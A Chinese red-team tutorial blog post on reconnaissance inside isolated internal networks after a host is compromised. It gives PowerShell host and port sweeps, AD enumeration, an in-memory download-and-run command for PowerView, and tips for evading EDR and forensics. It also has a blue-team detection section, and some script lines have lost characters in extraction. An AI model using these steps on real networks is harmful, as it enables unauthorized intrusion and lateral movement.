内网信息收集不出网主机探测与资产梳理技巧免责声明本文内容仅用于授权内网渗透演练、企业安全自查、安全学习研究严禁在未授权的内网环境进行主机扫描、端口探测、信息搜集等操作。未经授权对计算机网络进行探测属于违法行为所有操作带来的法律后果由操作者自行承担。前言内网渗透的第一步永远是信息收集。很多时候我们拿到的沦陷主机处于隔离内网、物理隔离环境、防火墙严格限制出站也就是常说的不出网主机无法访问外网不能直接上传大型扫描工具不能直接调用在线 APIDNS 请求、ICMP 甚至 TCP 出站都可能被限制。不出网环境和普通能上网的内网环境最大的区别所有探测、资产梳理必须依托系统自带原生工具LotL尽量减少二进制落地规避 EDR / 防火墙告警同时还要考虑网络限制禁 ping、禁外网。很多新手踩坑拿到一台不出网机器直接上传 nmap 全端口扫描结果被 EDR 拦截、触发流量告警或者直接 ping 整个网段防火墙屏蔽 ICMP 导致大量存活主机探测不到。本文系统讲解不出网场景下网段识别、存活主机探测、端口扫描、域信息收集、资产梳理、规避检测的实战技巧区分 Windows/Linux 不同环境附带各类原生命令、PowerShell 脚本以及蓝队视角的检测要点。适用场景隔离业务内网、生产域环境、DMZ 隔离区、堡垒机跳转环境、横向移动后拿到的不出网工作站 / 服务器。一、前置先识别当前网络基础信息不出网第一步拿到不出网主机第一件事不是扫网段先摸清本机网卡、路由、DNS、是否在域内判断我们所处的网络边界。全部使用系统自带命令无文件、无落地。Windows 主机基础信息收集# 网卡、IP、掩码 ipconfig /all # 路由表查看可达网段重点看静态路由 route print # ARP缓存这是不出网探测非常重要的数据源 arp -a # DNS配置 nslookup # 判断是否加入域 systeminfo | findstr Domain # 查看本地主机名、当前用户 whoami # 查看网络连接已经建立的内网连接 netstat -ano # 查看共享 net view重点关注是否多网卡双网卡主机经常是跨网段跳板路由表中的静态路由代表存在其他可达内网网段arp 缓存操作系统会缓存最近通信过的内网 IParp 表里面的 IP 基本都是存活主机这是不出网场景低成本资产线索。Linux 主机基础信息收集ip a route -n arp -n cat /etc/resolv.conf netstat -antp hostname不出网环境重点路由表 ping 扫描。很多内网防火墙禁 ICMPping 不通不代表主机下线路由表可以发现额外网段。二、存活主机探测不出网环境的多种方案从低特征到高特征2.1 ARP 探测推荐低特征禁 ping 环境首选ARP 工作在二层不受 ICMP 策略限制内网绝大多数防火墙不会拦截 ARP是不出网环境最可靠的存活探测手段。原理发送 ARP 请求询问 MAC有回复 主机存活。Windows PowerShell ARP 扫描原生无需额外工具# 遍历192.168.1.1-192.168.1.254网段ARP探测 1..254 | ForEach-Object {Start-Job { $ip192.168.1.$_;Test-Connection $ip -Count 1 -TimeoutSeconds 1}} | Wait-Job arp -a原理Test-Connection 会触发 ARP 解析哪怕 ping 被防火墙拦截只要二层可达ARP 缓存会记录 MAC 地址。最后arp -a读取缓存提取存活 IP。也可以使用纯 ARP 脚本不依赖 ICMP$net192.168.1. 1..254 | %{ $ip $net $_; try{ $null New-Object System.Net.NetworkInformation.Ping.Send($ip,100)}catch{} } arp -a优点低特征LotL不需要上传工具缺点只能扫描同广播域跨 VLAN 无法 ARP 探测跨网段 ARP 请求会被网关丢弃。2.2 TCP 端口探测判断存活ICMP 完全封禁场景很多内网防火墙直接丢弃 ICMPping 完全失效。此时可以尝试TCP 握手探测尝试连接常见端口如果 TCP 三次握手有响应或者 RST 包代表 IP 主机存活。常见探测端口135,445,80,443,3389,22Windows 域环境重点 135/445。PowerShell 原生 TCP 探测无第三方工具$ports(135,445,3389) 1..254 | %{ $ip192.168.1.$_ foreach($p in $ports){ $tcpsockNew-Object System.Net.Sockets.TCPClient try{$tcpsock.Connect($ip,$p);Write-Host $ip $p open;$tcpsock.Close()}catch{} } }思路不需要完整端口扫描只要任意一个端口有响应判定主机存活。2.3 利用已有连接、会话缓存挖掘资产最低特征红队优先不出网环境尽量不主动发包扫描优先读取系统已经缓存的信息几乎无网络行为不容易触发告警。arp -a历史通信 IP 与 MACnetstat -ano本机已经建立 TCP 连接的内网 IP浏览器历史、RDP 保存的连接记录、powershell 历史命令域环境net view、net group读取域内计算机列表不需要扫描直接从 AD 拉取资产清单。域内不出网主机优先用 AD 查询资产清单不用扫描直接拿到全部域内计算机对象。# PowerView读取域内所有计算机不出网本地域查询 Get-ADComputer -Filter * | Select Name,DNSHostName,OperatingSystem注意这个请求是内网 LDAP 查询不需要外网仅和域控通信。2.4 不推荐大规模 ping 扫描for /L %i in (1,1,254) do ping -n 1 -w 200 192.168.1.%i缺点大量 ICMP 包容易被内网 IDS/EDR 检测禁 ping 环境完全失效仅作为补充手段。三、端口探测技巧不出网环境轻量化扫描策略不出网主机尽量避免全端口扫描1-65535发包量大极易触发告警优先重点端口扫描只扫描内网高频服务端口。Windows 原生 PowerShell 端口扫描LotL无落地function portscan{ param($ip,$ports) foreach($p in $ports){ $cNew-Object System.Net.Sockets.TCPClient try{$c.Connect($ip,$p);Write-Host $ip : $p open;$c.Close()}catch{} } } # 批量扫描单台主机重点端口 portscan -ip 192.168.1.10 -ports (22,80,135,445,3389,443,5985,5986)重点端口清单内网高频端口服务渗透价值135RPCWMI、远程调用横向移动入口445SMB文件共享、PsExec域横向核心3389RDP远程桌面5985/5986WinRMPowerShell 远程管理22SSHLinux 远程80/443Web 服务Web 漏洞、后台1433MSSQL数据库服务3306MySQL数据库不出网扫描策略建议先存活探测拿到存活 IP 列表再针对存活 IP 做端口扫描不要直接全网端口扫描控制并发、增加延时避免短时间大量 TCP 请求触发告警不使用 nmapnmap 特征明显很多 EDR 直接拦截跨网段扫描流量经过网关更容易被审计优先同网段资产。四、域环境不出网主机域资产信息收集无需全网扫描如果沦陷主机在 AD 域内资产清单保存在域控 AD 数据库中我们不需要扫描网络直接通过 LDAP 查询拿到完整资产列表、操作系统、SPN、用户、组、OU。这是域不出网环境最高效的资产梳理方式。前提主机域内拥有普通域账号权限只走内网 LDAP389/636不需要出外网。4.1 原生命令收集域资产# 查看域内计算机列表 net group Domain Computers /domain # 查看域用户 net user /domain # 查看域组 net group /domain4.2 PowerViewPowerShell内存加载无文件落地内存加载 PowerView不写磁盘适合不出网隔离环境# 远程内存加载如果内网可以访问不出网环境可粘贴脚本到内存执行 IEX(New-Object Net.WebClient).DownloadString(http://内网跳板IP/PowerView.ps1) # 查询所有域计算机 Get-ADComputer -Filter * | Select Name,DNSHostName,IPAddress,OperatingSystem # 查询SPN服务账号Kerberoast资产 Get-DomainSPN注意完全物理隔离不出网无法下载脚本可以把 PowerView 代码复制粘贴到 PowerShell 窗口直接内存执行不落地文件。4.3 收集域会话、登录信息# 查询域内用户登录会话BloodHound采集基础数据 Get-DomainUser Get-DomainGroup Get-DomainOU Get-DomainGPO拿到这些信息就可以直接梳理域控、文件服务器、数据库、运维工作站、高价值业务服务器。五、资产信息整理与资产台账梳理方法信息收集不是单纯扫 IP最终目标是整理一份资产台账区分资产价值规划横向移动路径。不出网环境资产台账建议记录下面字段IP 地址、MAC 地址、主机名操作系统版本Win2012/2019、CentOS 等开放端口、运行服务是否域控 / 文件服务器 / 数据库 / 业务 Web域角色、OU 归属存在的账号、登录会话可达网段、路由信息高风险标记445、WinRM、SPN 账号、旧系统。资产分类优先级红队最高价值域控、数据库服务器、核心业务服务器次高价值文件服务器、运维管理机、开启 445/WinRM 服务器普通资产员工工作站。小技巧整理资产的时候同步记录网段边界区分哪些网段可达哪些被防火墙隔离寻找跨网段跳板机双网卡主机。六、不出网环境探测的避坑与免检测技巧不出网隔离内网IDS、EDR、流量审计一般监控更加严格这里总结实战避坑要点优先读缓存后主动发包arp 缓存、netstat、AD 查询这类几乎无探测流量告警风险最低尽量 LotL 原生 API/PowerShell避免上传 nmap、masscan 等特征扫描器降低扫描并发增加延时不要一秒大量发包分段扫描先同网段再尝试跨网段跨网段探测流量更容易被网关审计不使用 ICMP 大规模扫描优先 ARP、TCP 端口探测内存加载脚本不落地文件到磁盘减少文件写入的 EDR 告警扫描结果尽量保存在内存变量避免写入本地磁盘 txt 日志防止取证留下痕迹注意内网防火墙和主机防火墙部分主机本地防火墙会丢弃 TCP 探测包导致端口探测误判。常见误判问题ARP 扫描只能同广播域跨 VLAN 无法 ARP端口探测返回 RST代表主机存活但端口关闭无响应可能是防火墙丢弃包不代表主机不存在AD 查询返回的计算机对象不代表主机当前开机AD 记录是静态资产清单需要结合网络探测确认是否在线多网卡主机路由表存在多个网段容易漏扫其他内网。七、蓝队检测如何发现内网主机探测行为监控大量 ARP 请求短时间单台主机向外发送大量 ARP 请求属于 ARP 扫描监控单源 IP 短时间大量 TCP 连接到 135、445、3389 等端口审计 LDAP 查询单台工作站大量查询 AD 计算机、用户、SPN 信息Sysmon 监控 PowerShell 执行 TCP socket、循环扫描脚本行为网络侧 IDS 检测内网横向扫描行为告警高频 TCP 握手审计进程调用System.Net.Sockets.TCPClient识别 PowerShell 端口扫描。防御加固思路内网划分 VLAN缩小广播域限制 ARP 扫描范围主机防火墙限制 135/445 访问非信任 IP 禁止访问 RPC、SMB监控普通工作站大量 LDAP 查询 AD 资产部署内网流量审计监控异常内网扫描行为。八、总结不出网隔离内网的信息收集核心思路和外网完全相反减少主动发包探测优先读取本地缓存、AD 域目录资产优先使用系统自带 LotL 能力尽量不落地第三方扫描工具。探测顺序推荐本机基础信息 → 路由 / ARP 缓存挖掘资产 → AD 查询域资产清单 → ARP 存活探测 → TCP 轻量化端口探测 → 资产台账整理标记高价值目标。ARP 适合同网段存活探测TCP 握手探测适合禁 ICMP 场景域环境直接 LDAP 查询 AD 资产是效率最高的手段无需全网扫描。内网探测最大的坑是盲目大规模扫描不仅容易触发告警还会出现大量误报。信息收集的目的不是扫出所有 IP而是精准定位高价值资产找到横向移动的突破口。最后关于网络安全技术储备网络安全是当今信息时代中非常重要的一环。无论是找工作还是感兴趣黑客都是未来职业选择中上上之选为了保护自己的网络安全学习网络安全知识是必不可少的。如果你是准备学习网络安全黑客或者正在学习下面这些你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】